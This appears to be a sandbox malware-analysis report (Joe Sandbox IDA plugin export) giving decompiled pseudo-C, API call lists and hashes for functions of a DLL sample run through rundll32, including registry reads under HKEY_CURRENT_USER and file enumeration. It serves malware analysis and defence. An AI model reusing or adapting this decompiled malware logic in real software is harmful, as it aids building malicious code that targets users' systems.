                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Time$CountCreateFileHeapSleepSwitchSystemThreadTick_aullrem
                                                  • String ID:
                                                  • API String ID: 507476733-0
                                                  • Opcode ID: ee686473559d0bba7a5f9af6e284f95be9337f9c1857e3540c6c52b53691bd95
                                                  • Instruction ID: 1356d8aea7593bdf70fd16b833a6d548a3929ad1389479c396c0dfa6bef3f5e2
                                                  • Opcode Fuzzy Hash: ee686473559d0bba7a5f9af6e284f95be9337f9c1857e3540c6c52b53691bd95
                                                  • Instruction Fuzzy Hash: 7D118A72B642016FD7109B64EC0EB6ABA99EF44761F108529F549D61C0EAB4E840C671
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 57%
                                                  			E052D225B(signed int __edx) {
                                                  				signed int _v8;
                                                  				long _v12;
                                                  				CHAR* _v16;
                                                  				long _v20;
                                                  				void* __edi;
                                                  				void* __esi;
                                                  				void* _t21;
                                                  				CHAR* _t22;
                                                  				CHAR* _t25;
                                                  				intOrPtr _t26;
                                                  				void* _t27;
                                                  				void* _t31;
                                                  				void* _t32;
                                                  				CHAR* _t36;
                                                  				CHAR* _t42;
                                                  				CHAR* _t43;
                                                  				CHAR* _t44;
                                                  				CHAR* _t46;
                                                  				void* _t49;
                                                  				void* _t51;
                                                  				CHAR* _t54;
                                                  				signed char _t56;
                                                  				intOrPtr _t58;
                                                  				signed int _t59;
                                                  				void* _t62;
                                                  				CHAR* _t65;
                                                  				CHAR* _t66;
                                                  				char* _t67;
                                                  				void* _t68;
                                                  
                                                  				_t61 = __edx;
                                                  				_v20 = 0;
                                                  				_v8 = 0;
                                                  				_v12 = 0;
                                                  				_t21 = E052D550E();
                                                  				if(_t21 != 0) {
                                                  					_t59 =  *0x52dd25c; // 0x4000000a
                                                  					_t55 = (_t59 & 0xf0000000) + _t21;
                                                  					 *0x52dd25c = (_t59 & 0xf0000000) + _t21;
                                                  				}
                                                  				_t22 =  *0x52dd164(0, 2); // executed
                                                  				_v16 = _t22;
                                                  				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                                  					_t25 = E052D3D0D( &_v8,  &_v20); // executed
                                                  					_t54 = _t25;
                                                  					_t26 =  *0x52dd27c; // 0x202a5a8
                                                  					if( *0x52dd25c > 5) {
                                                  						_t8 = _t26 + 0x52de5cd; // 0x4d283a53
                                                  						_t27 = _t8;
                                                  					} else {
                                                  						_t7 = _t26 + 0x52dea15; // 0x44283a44
                                                  						_t27 = _t7;
                                                  					}
                                                  					E052D1BF4(_t27, _t27);
                                                  					_t31 = E052D1B2F(_t61,  &_v20,  &_v12); // executed
                                                  					if(_t31 == 0) {
                                                  						CloseHandle(_v20);
                                                  					}
                                                  					_t62 = 5;
                                                  					if(_t54 != _t62) {
                                                  						 *0x52dd270 =  *0x52dd270 ^ 0x81bbe65d;
                                                  						_t32 = E052D2049(0x60);
                                                  						__eflags = _t32;
                                                  						 *0x52dd32c = _t32;
                                                  						if(_t32 == 0) {
                                                  							_push(8);
                                                  							_pop(0);
                                                  						} else {
                                                  							memset(_t32, 0, 0x60);
                                                  							_t49 =  *0x52dd32c; // 0x73095b0
                                                  							_t68 = _t68 + 0xc;
                                                  							__imp__(_t49 + 0x40);
                                                  							_t51 =  *0x52dd32c; // 0x73095b0
                                                  							 *_t51 = 0x52de836;
                                                  						}
                                                  						__eflags = 0;
                                                  						_t54 = 0;
                                                  						if(0 == 0) {
                                                  							_t36 = RtlAllocateHeap( *0x52dd238, 0, 0x43);
                                                  							__eflags = _t36;
                                                  							 *0x52dd2c4 = _t36;
                                                  							if(_t36 == 0) {
                                                  								_push(8);
                                                  								_pop(0);
                                                  							} else {
                                                  								_t56 =  *0x52dd25c; // 0x4000000a
                                                  								_t61 = _t56 & 0x000000ff;
                                                  								_t58 =  *0x52dd27c; // 0x202a5a8
                                                  								_t13 = _t58 + 0x52de55a; // 0x697a6f4d
                                                  								_t55 = _t13;
                                                  								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x52dc2a7);
                                                  							}
                                                  							__eflags = 0;
                                                  							_t54 = 0;
                                                  							if(0 == 0) {
                                                  								asm("sbb eax, eax");
                                                  								E052D269C( ~_v8 &  *0x52dd270, 0x52dd00c); // executed
                                                  								_t42 = E052D4094(_t55); // executed
                                                  								_t54 = _t42;
                                                  								__eflags = _t54;
                                                  								if(_t54 != 0) {
                                                  									goto L30;
                                                  								}
                                                  								_t43 = E052D96A4(_t55); // executed
                                                  								__eflags = _t43;
                                                  								if(_t43 != 0) {
                                                  									__eflags = _v8;
                                                  									_t65 = _v12;
                                                  									if(_v8 != 0) {
                                                  										L29:
                                                  										_t44 = E052D6786(_t61, _t65, _v8); // executed
                                                  										_t54 = _t44;
                                                  										goto L30;
                                                  									}
                                                  									__eflags = _t65;
                                                  									if(__eflags == 0) {
                                                  										goto L30;
                                                  									}
                                                  									_t46 = E052D3DD9(__eflags,  &(_t65[4])); // executed
                                                  									_t54 = _t46;
                                                  									__eflags = _t54;
                                                  									if(_t54 == 0) {
                                                  										goto L30;
                                                  									}
                                                  									goto L29;
                                                  								}
                                                  								_t54 = 8;
                                                  							}
                                                  						}
                                                  					} else {
                                                  						_t66 = _v12;
                                                  						if(_t66 == 0) {
                                                  							L30:
                                                  							if(_v16 == 0 || _v16 == 1) {
                                                  								 *0x52dd160();
                                                  							}
                                                  							goto L34;
                                                  						}
                                                  						_t67 =  &(_t66[4]);
                                                  						do {
                                                  						} while (E052DA501(_t62, _t67, 0, 1) == 0x4c7);
                                                  					}
                                                  					goto L30;
                                                  				} else {
                                                  					_t54 = _t22;
                                                  					L34:
                                                  					return _t54;
                                                  				}
                                                  			}
                                                  Instruction addresses for the listing above (in the original layout one address sits beside each decompiled line; the per-line mapping is not preserved here): 0x052d225b .. 0x052d2435

                                                  APIs
                                                    • Part of subcall function 052D550E: GetModuleHandleA.KERNEL32(4C44544E,00000000,052D2274,00000000,00000000), ref: 052D551D
                                                  • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 052D22F1
                                                    • Part of subcall function 052D2049: RtlAllocateHeap.NTDLL(00000000,00000000,052D7E50), ref: 052D2055
                                                  • memset.NTDLL ref: 052D2340
                                                  • RtlInitializeCriticalSection.NTDLL(07309570), ref: 052D2351
                                                    • Part of subcall function 052D3DD9: memset.NTDLL ref: 052D3DEE
                                                    • Part of subcall function 052D3DD9: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 052D3E22
                                                    • Part of subcall function 052D3DD9: StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 052D3E2D
                                                  • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 052D237C
                                                  • wsprintfA.USER32 ref: 052D23AC
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                                  • String ID:
                                                  • API String ID: 4246211962-0
                                                  • Opcode ID: 153ca2791f740ac308fd92b72006689daf45f71af49d2ff8c0f80b2d42cc51d5
                                                  • Instruction ID: 15242761887a57184e34660efbb94dcccd1d107aaff2fbf7878ebd0f99a0da4b
                                                  • Opcode Fuzzy Hash: 153ca2791f740ac308fd92b72006689daf45f71af49d2ff8c0f80b2d42cc51d5
                                                  • Instruction Fuzzy Hash: 7851C275E35616EBDB219BA4EC4DE6EBBA9BF04710F004426F906E7181EAB499408B70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  Basic blocks (node: address range, API or call in the block):
                                                  • 202: 52d94a9-52d94bc
                                                  • 203: 52d94c3-52d94c7 (StrChrA)
                                                  • 204: 52d94be-52d94c2
                                                  • 205: 52d94c9-52d94da (call 52d2049)
                                                  • 208: 52d94dc-52d94e8 (StrTrimA)
                                                  • 209: 52d951f
                                                  • 210: 52d94ea-52d94f3 (StrChrA)
                                                  • 211: 52d9521-52d9528
                                                  • 212: 52d9505-52d9511
                                                  • 213: 52d94f5-52d94ff (StrTrimA)
                                                  • 214: 52d9513-52d951d
                                                  Edges: 202->203, 203->204, 203->205, 204->203, 205->208, 205->209, 208->210, 209->211, 210->212, 210->213, 212->210, 212->214, 213->212, 214->211
                                                  C-Code - Quality: 53%
                                                  			E052D94A9(char* __eax) {
                                                  				char* _t8;
                                                  				intOrPtr _t12;
                                                  				char* _t21;
                                                  				signed int _t23;
                                                  				char* _t24;
                                                  				signed int _t26;
                                                  				void* _t27;
                                                  
                                                  				_t21 = __eax;
                                                  				_push(0x20);
                                                  				_t23 = 1;
                                                  				_push(__eax);
                                                  				// First pass: count tokens as (number of 0x20 bytes found by StrChrA) + 1, before any trimming.
                                                  				while(1) {
                                                  					_t8 = StrChrA();
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_t23 = _t23 + 1;
                                                  					_push(0x20);
                                                  					_push( &(_t8[1]));
                                                  				}
                                                  				// Allocate one pointer slot per counted token (E052D2049 wraps RtlAllocateHeap, see the APIs list for the caller).
                                                  				_t12 = E052D2049(_t23 << 2);
                                                  				 *((intOrPtr*)(_t27 + 0x10)) = _t12;
                                                  				if(_t12 != 0) {
                                                  					// Second pass: trim the whole buffer, then split it in place on 0x20, trimming each remainder.
                                                  					StrTrimA(_t21, 0x52dc2a4); // executed
                                                  					_t26 = 0;
                                                  					do {
                                                  						_t24 = StrChrA(_t21, 0x20);
                                                  						if(_t24 != 0) {
                                                  							 *_t24 = 0; // NUL-terminate the current token
                                                  							_t24 =  &(_t24[1]);
                                                  							StrTrimA(_t24, 0x52dc2a4);
                                                  						}
                                                  						 *( *((intOrPtr*)(_t27 + 0x10)) + _t26 * 4) = _t21; // array[_t26] = token pointer
                                                  						_t26 = _t26 + 1;
                                                  						_t21 = _t24;
                                                  					} while (_t24 != 0);
                                                  					// Only the array pointer is handed back through the out-parameter; no element count is written,
                                                  					// so slots beyond the stored tokens (trimming can reduce the count) are left as allocated.
                                                  					 *((intOrPtr*)( *((intOrPtr*)(_t27 + 0x18)))) =  *((intOrPtr*)(_t27 + 0x10));
                                                  				}
                                                  				return 0;
                                                  			}

                                                  Instruction addresses for the listing above (one address per decompiled line in the original layout; the per-line mapping is not preserved here): 0x052d94b4 .. 0x052d9528

                                                  APIs
                                                  • StrChrA.SHLWAPI(?,00000020,00000000,073095AC,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94C3
                                                  • StrTrimA.KERNELBASE(?,052DC2A4,00000002,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94E2
                                                  • StrChrA.SHLWAPI(?,00000020,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94ED
                                                  • StrTrimA.SHLWAPI(00000001,052DC2A4,?,052D23DE,?,052D7634,073095AC,?,052D23DE), ref: 052D94FF
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Trim
                                                  • String ID:
                                                  • API String ID: 3043112668-0
                                                  • Opcode ID: ffb70c58790d4a2ffb0033725889bdde659c152e9dfa079e55a3dd9999032f80
                                                  • Instruction ID: 3c302a714e3dd772f8b78b437f8394573b1825021df2c96b8660c7175bc1bf3b
                                                  • Opcode Fuzzy Hash: ffb70c58790d4a2ffb0033725889bdde659c152e9dfa079e55a3dd9999032f80
                                                  • Instruction Fuzzy Hash: 030152716293265FD3219E69DC4DF37FF9CFF856A0F110519F985D7241DA60C80186B1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph

                                                  C-Code - Quality: 90%
                                                  			E052D3DD9(void* __eflags, int _a4) {
                                                  				intOrPtr _v12;
                                                  				WCHAR* _v16;
                                                  				char* _v20;
                                                  				int _v24;
                                                  				void* _v36;
                                                  				char _v40;
                                                  				char _v68;
                                                  				char _v72;
                                                  				char _v76;
                                                  				char _v80;
                                                  				void _v84;
                                                  				char _v88;
                                                  				void* __ebx;
                                                  				void* __esi;
                                                  				intOrPtr _t40;
                                                  				int _t45;
                                                  				intOrPtr _t50;
                                                  				intOrPtr _t52;
                                                  				void* _t55;
                                                  				intOrPtr _t67;
                                                  				void* _t70;
                                                  				void* _t80;
                                                  				WCHAR* _t85;
                                                  
                                                  				_v88 = 0;
                                                  				memset( &_v84, 0, 0x2c);
                                                  				_v40 = 0;
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				asm("stosd");
                                                  				_t40 =  *0x52dd27c; // 0x202a5a8: base of the string table referenced below
                                                  				_t5 = _t40 + 0x52dee40; // 0x410025 read as UTF-16LE is "%A", the start of an environment-variable reference
                                                  				_t85 = E052D6A12(_t5); // E052D6A12 wraps ExpandEnvironmentStringsW (see the APIs list below)
                                                  				_v16 = _t85;
                                                  				if(_t85 == 0) {
                                                  					_t80 = 8;
                                                  					L24:
                                                  					return _t80;
                                                  				}
                                                  				_t45 = StrCmpNIW(_t85, _a4, lstrlenW(_t85)); // executed; case-insensitive check that _a4 starts with the expanded path
                                                  				if(_t45 != 0) {
                                                  					_t80 = 1;
                                                  					L22:
                                                  					E052D9039(_v16);
                                                  					goto L24;
                                                  				}
                                                  				if(E052DA72D(0,  &_a4) != 0) {
                                                  					_a4 = 0;
                                                  				}
                                                  				_t50 = E052D809F(0,  *0x52dd33c);
                                                  				_v12 = _t50;
                                                  				if(_t50 == 0) {
                                                  					_t80 = 8;
                                                  					goto L19;
                                                  				} else {
                                                  					_t52 =  *0x52dd27c; // 0x202a5a8
                                                  					_t11 = _t52 + 0x52de81a; // 0x65696c43 read as ASCII bytes is "Clie", the start of the name resolved by E052D809F
                                                  					_t55 = E052D809F(0, _t11);
                                                  					_t87 = _t55;
                                                  					if(_t55 == 0) {
                                                  						_t80 = 8;
                                                  					} else {
                                                  						_t80 = E052D6BFA(_a4, 0x80000001, _v12, _t87,  &_v88,  &_v84); // 0x80000001 is HKEY_CURRENT_USER; result lands in _v88/_v84
                                                  						E052D9039(_t87);
                                                  					}
                                                  					if(_t80 != 0) {
                                                  						L17:
                                                  						E052D9039(_v12);
                                                  						L19:
                                                  						_t86 = _a4;
                                                  						if(_a4 != 0) {
                                                  							E052D1F99(_t86);
                                                  						}
                                                  						goto L22;
                                                  					} else {
                                                  						if(( *0x52dd260 & 0x00000001) == 0) {
                                                  							L14:
                                                  							E052D8F83(_t80, _v88, _v84,  *0x52dd270, 0);
                                                  							_t80 = E052D1C74(_v88,  &_v80,  &_v76, 0);
                                                  							if(_t80 == 0) {
                                                  								_v24 = _a4;
                                                  								_v20 =  &_v88;
                                                  								_t80 = E052D42EA( &_v40, 0);
                                                  							}
                                                  							E052D9039(_v88);
                                                  							goto L17;
                                                  						}
                                                  						_t67 =  *0x52dd27c; // 0x202a5a8
                                                  						_t18 = _t67 + 0x52de823; // 0x65696c43
                                                  						_t70 = E052D809F(0, _t18);
                                                  						_t89 = _t70;
                                                  						if(_t70 == 0) {
                                                  							_t80 = 8;
                                                  						} else {
                                                  							_t80 = E052D6BFA(_a4, 0x80000001, _v12, _t89,  &_v72,  &_v68); // HKEY_CURRENT_USER again, second name, result in _v72/_v68
                                                  							E052D9039(_t89);
                                                  						}
                                                  						if(_t80 != 0) {
                                                  							goto L17;
                                                  						} else {
                                                  							goto L14;
                                                  						}
                                                  					}
                                                  				}
                                                  			}

                                                  Instruction addresses for the listing above (one address per decompiled line in the original layout; the per-line mapping is not preserved here): 0x052d3deb .. 0x052d3f72

                                                  APIs
                                                  • memset.NTDLL ref: 052D3DEE
                                                    • Part of subcall function 052D6A12: ExpandEnvironmentStringsW.KERNEL32(00000000,00000000,00000000,?,?,00000000,052D3E14,00410025,00000005,?,00000000), ref: 052D6A23
                                                    • Part of subcall function 052D6A12: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000), ref: 052D6A40
                                                  • lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 052D3E22
                                                  • StrCmpNIW.KERNELBASE(00000000,00000000,00000000), ref: 052D3E2D
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: EnvironmentExpandStrings$lstrlenmemset
                                                  • String ID:
                                                  • API String ID: 3817122888-0
                                                  • Opcode ID: af589a2427fd0e3f6cfda11b67cdb5478732abb551cc71c54a4ca7fc24fb4cef
                                                  • Instruction ID: 91c2eaea0ab45a0d6ba37669e67ecfa5c857255320be12b304d94631f5743759
                                                  • Opcode Fuzzy Hash: af589a2427fd0e3f6cfda11b67cdb5478732abb551cc71c54a4ca7fc24fb4cef
                                                  • Instruction Fuzzy Hash: 27416C72A2121DAFDB11EFE4DC88DAEFBBDBF18250F004525F905EA150DA71DA448BB1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: [graph image not included in this export; node legend: Executed / Not Executed]
                                                  C-Code - Quality: 100%
                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                  				intOrPtr _t4;
                                                  				void* _t10;
                                                  				void* _t11;
                                                  				void* _t12;
                                                  				void* _t14;
                                                  
                                                  				_t14 = 1;
                                                  				_t4 = _a8;
                                                  				if(_t4 == 0) {
                                                  					if(InterlockedDecrement(0x52dd23c) == 0) {
                                                  						E052D970F();
                                                  					}
                                                  				} else {
                                                  					if(_t4 == 1 && InterlockedIncrement(0x52dd23c) == 1) {
                                                  						_t10 = E052D6A56(_t11, _t12, _a4); // executed
                                                  						if(_t10 != 0) {
                                                  							_t14 = 0;
                                                  						}
                                                  					}
                                                  				}
                                                  				return _t14;
                                                  			}

                                                  APIs
                                                  • InterlockedIncrement.KERNEL32(052DD23C), ref: 052D806A
                                                    • Part of subcall function 052D6A56: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,052D807D,?), ref: 052D6A69
                                                  • InterlockedDecrement.KERNEL32(052DD23C), ref: 052D808A
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                  • String ID:
                                                  • API String ID: 3834848776-0
                                                  • Opcode ID: 145ec91f339ecc1e657ec45e62a2e18ad682db9a97aa1500a03531346f8da1e7
                                                  • Instruction ID: 893ce5e1525bc1d2615f086a84c9769a5dcecde2c7f1173f9ac41314e240237a
                                                  • Opcode Fuzzy Hash: 145ec91f339ecc1e657ec45e62a2e18ad682db9a97aa1500a03531346f8da1e7
                                                  • Instruction Fuzzy Hash: 51E04F753782225786317B749C0CF7EEA52BF20A92F198514F6CDD4090CA60C8809AF1
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: [graph image not included in this export; node legend: Executed / Not Executed]
                                                  C-Code - Quality: 87%
                                                  			E052D73FD(void* __edx) {
                                                  				char _v8;
                                                  				char _v12;
                                                  				void* _v16;
                                                  				void* __esi;
                                                  				void* _t23;
                                                  				intOrPtr _t24;
                                                  				intOrPtr _t32;
                                                  				intOrPtr _t35;
                                                  				intOrPtr _t38;
                                                  				intOrPtr _t42;
                                                  				void* _t45;
                                                  				void* _t50;
                                                  				void* _t55;
                                                  
                                                  				_t50 = __edx;
                                                  				_v12 = 0;
                                                  				_t23 = E052DA72D(0,  &_v8); // executed
                                                  				if(_t23 != 0) {
                                                  					_v8 = 0;
                                                  				}
                                                  				_t24 =  *0x52dd27c; // 0x202a5a8
                                                  				_t4 = _t24 + 0x52dede0; // 0x7309388
                                                  				_t5 = _t24 + 0x52ded88; // 0x4f0053
                                                  				_t45 = E052D1262( &_v16, _v8, _t5, _t4);
                                                  				if(_t45 == 0) {
                                                  					 *0x52dd0f4(_v16, 0,  &_v12);
                                                  					_t45 = 8;
                                                  					if(_v12 < _t45) {
                                                  						_t45 = 1;
                                                  						__eflags = 1;
                                                  					} else {
                                                  						_t32 =  *0x52dd27c; // 0x202a5a8
                                                  						_t11 = _t32 + 0x52dedd4; // 0x730937c
                                                  						_t48 = _t11;
                                                  						_t12 = _t32 + 0x52ded88; // 0x4f0053
                                                  						_t55 = E052D7CB8(_t11, _t12, _t11);
                                                  						_t59 = _t55;
                                                  						if(_t55 != 0) {
                                                  							_t35 =  *0x52dd27c; // 0x202a5a8
                                                  							_t13 = _t35 + 0x52dee1e; // 0x30314549
                                                  							if(E052D89D6(_t48, _t50, _t59, _v8, _t55, _t13, 0x14) == 0) {
                                                  								_t61 =  *0x52dd25c - 6;
                                                  								if( *0x52dd25c <= 6) {
                                                  									_t42 =  *0x52dd27c; // 0x202a5a8
                                                  									_t15 = _t42 + 0x52dec2a; // 0x52384549
                                                  									E052D89D6(_t48, _t50, _t61, _v8, _t55, _t15, 0x13);
                                                  								}
                                                  							}
                                                  							_t38 =  *0x52dd27c; // 0x202a5a8
                                                  							_t17 = _t38 + 0x52dee18; // 0x73093c0
                                                  							_t18 = _t38 + 0x52dedf0; // 0x680043
                                                  							_t45 = E052D2659(_v8, 0x80000001, _t55, _t18, _t17);
                                                  							HeapFree( *0x52dd238, 0, _t55);
                                                  						}
                                                  					}
                                                  					HeapFree( *0x52dd238, 0, _v16);
                                                  				}
                                                  				_t54 = _v8;
                                                  				if(_v8 != 0) {
                                                  					E052D1F99(_t54);
                                                  				}
                                                  				return _t45;
                                                  			}

                                                  APIs
                                                  • HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,073093C0,?,00000000,30314549,00000014,004F0053,0730937C), ref: 052D74E9
                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,052D6814), ref: 052D74FB
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FreeHeap
                                                  • String ID:
                                                  • API String ID: 3298025750-0
                                                  • Opcode ID: 8c1ee0a487f0eefd7d9da3f2980b15accf9464382ca0fac863391d64c6f88e80
                                                  • Instruction ID: 22cd7df2f782aff43f40a4a0c278d59d2e27810b1d82169f66458fc8a3e7796a
                                                  • Opcode Fuzzy Hash: 8c1ee0a487f0eefd7d9da3f2980b15accf9464382ca0fac863391d64c6f88e80
                                                  • Instruction Fuzzy Hash: E4314F72A21109BFEF11DBA4EC89EAABFBDEF44710F150055F505AB1A1DB709A04DB70
                                                  Uniqueness

                                                  Uniqueness Score: -1.00%

                                                  Control-flow Graph: [graph image not included in this export; node legend: Executed / Not Executed]
                                                  C-Code - Quality: 70%
                                                  			E052D21CD(void* __ecx, signed char* _a4) {
                                                  				void* _v8;
                                                  				void* _t8;
                                                  				signed short _t11;
                                                  				signed int _t12;
                                                  				signed int _t14;
                                                  				intOrPtr _t15;
                                                  				void* _t19;
                                                  				signed short* _t22;
                                                  				void* _t24;
                                                  				intOrPtr* _t27;
                                                  
                                                  				_t24 = 0;
                                                  				_push(0);
                                                  				_t19 = 1;
                                                  				_t27 = 0x52dd330;
                                                  				E052D84D5();
                                                  				while(1) {
                                                  					_t8 = E052D12D4(_a4,  &_v8); // executed
                                                  					if(_t8 == 0) {
                                                  						break;
                                                  					}
                                                  					_push(_v8);
                                                  					_t14 = 0xd;
                                                  					_t15 = E052D809F(_t14);
                                                  					if(_t15 == 0) {
                                                  						HeapFree( *0x52dd238, 0, _v8);
                                                  						break;
                                                  					} else {
                                                  						 *_t27 = _t15;
                                                  						_t27 = _t27 + 4;
                                                  						_t24 = _t24 + 1;
                                                  						if(_t24 < 3) {
                                                  							continue;
                                                  						} else {
                                                  						}
                                                  					}
                                                  					L7:
                                                  					_push(1);
                                                  					E052D84D5();
                                                  					if(_t19 != 0) {
                                                  						_t22 =  *0x52dd338; // 0x7309b70
                                                  						_t11 =  *_t22 & 0x0000ffff;
                                                  						if(_t11 < 0x61 || _t11 > 0x7a) {
                                                  							_t12 = _t11 & 0x0000ffff;
                                                  						} else {
                                                  							_t12 = (_t11 & 0x0000ffff) - 0x20;
                                                  						}
                                                  						 *_t22 = _t12;
                                                  					}
                                                  					return _t19;
                                                  				}
                                                  				_t19 = 0;
                                                  				goto L7;
                                                  			}

                                                  APIs
                                                    • Part of subcall function 052D84D5: GetProcAddress.KERNEL32(36776F57,052D21E5), ref: 052D84F0
                                                    • Part of subcall function 052D12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3,00000000), ref: 052D12FF
                                                    • Part of subcall function 052D12D4: RtlAllocateHeap.NTDLL(00000000,63699BC3), ref: 052D1321
                                                    • Part of subcall function 052D12D4: memset.NTDLL ref: 052D133B
                                                    • Part of subcall function 052D12D4: CreateFileA.KERNELBASE(00000000,80000000,00000001,00000000,00000003,00000080,00000000,73797325), ref: 052D1379
                                                    • Part of subcall function 052D12D4: GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 052D138D
                                                    • Part of subcall function 052D12D4: FindCloseChangeNotification.KERNELBASE(00000000), ref: 052D13A4
                                                    • Part of subcall function 052D12D4: StrRChrA.SHLWAPI(?,00000000,0000005C), ref: 052D13B0
                                                    • Part of subcall function 052D12D4: lstrcat.KERNEL32(?,642E2A5C), ref: 052D13F1
                                                    • Part of subcall function 052D12D4: FindFirstFileA.KERNELBASE(?,?), ref: 052D1407
                                                    • Part of subcall function 052D809F: lstrlen.KERNEL32(?,00000000,052DD330,00000001,052D2200,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9), ref: 052D80A8
                                                    • Part of subcall function 052D809F: mbstowcs.NTDLL ref: 052D80CF
                                                    • Part of subcall function 052D809F: memset.NTDLL ref: 052D80E1
                                                  • HeapFree.KERNEL32(00000000,052DD00C,052DD00C,052DD00C,00000000,00000005,00000000,00000000,?,?,?,052D96C1,052D23E9,052DD00C,?,052D23E9), ref: 052D221C
                                                  Memory Dump Source
                                                  • Source File: 0000001D.00000002.379296556.00000000052D1000.00000020.00020000.sdmp, Offset: 052D0000, based on PE: true
                                                  • Associated: 0000001D.00000002.379282965.00000000052D0000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379323121.00000000052DC000.00000002.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379335669.00000000052DD000.00000004.00020000.sdmp
                                                  • Associated: 0000001D.00000002.379354513.00000000052DF000.00000002.00020000.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_29_2_52d0000_rundll32.jbxd
                                                  Similarity
                                                  • API ID: FileHeap$AllocateFindmemset$AddressChangeCloseCreateFirstFreeNotificationProcTimelstrcatlstrlenmbstowcs
                                                  • String ID:
                                                  • API String ID: 983081259-0
                                                  • Opcode ID: 72a91d81bdf9deca51afdd1986271705c241447ba7b849ad3b7ead8678f8f218
                                                  • Instruction ID: 78dca4c7302e4a91952f3cf2e682112942058fece634946b6d8681fefe69515e
                                                  • Opcode Fuzzy Hash: 72a91d81bdf9deca51afdd1986271705c241447ba7b849ad3b7ead8678f8f218
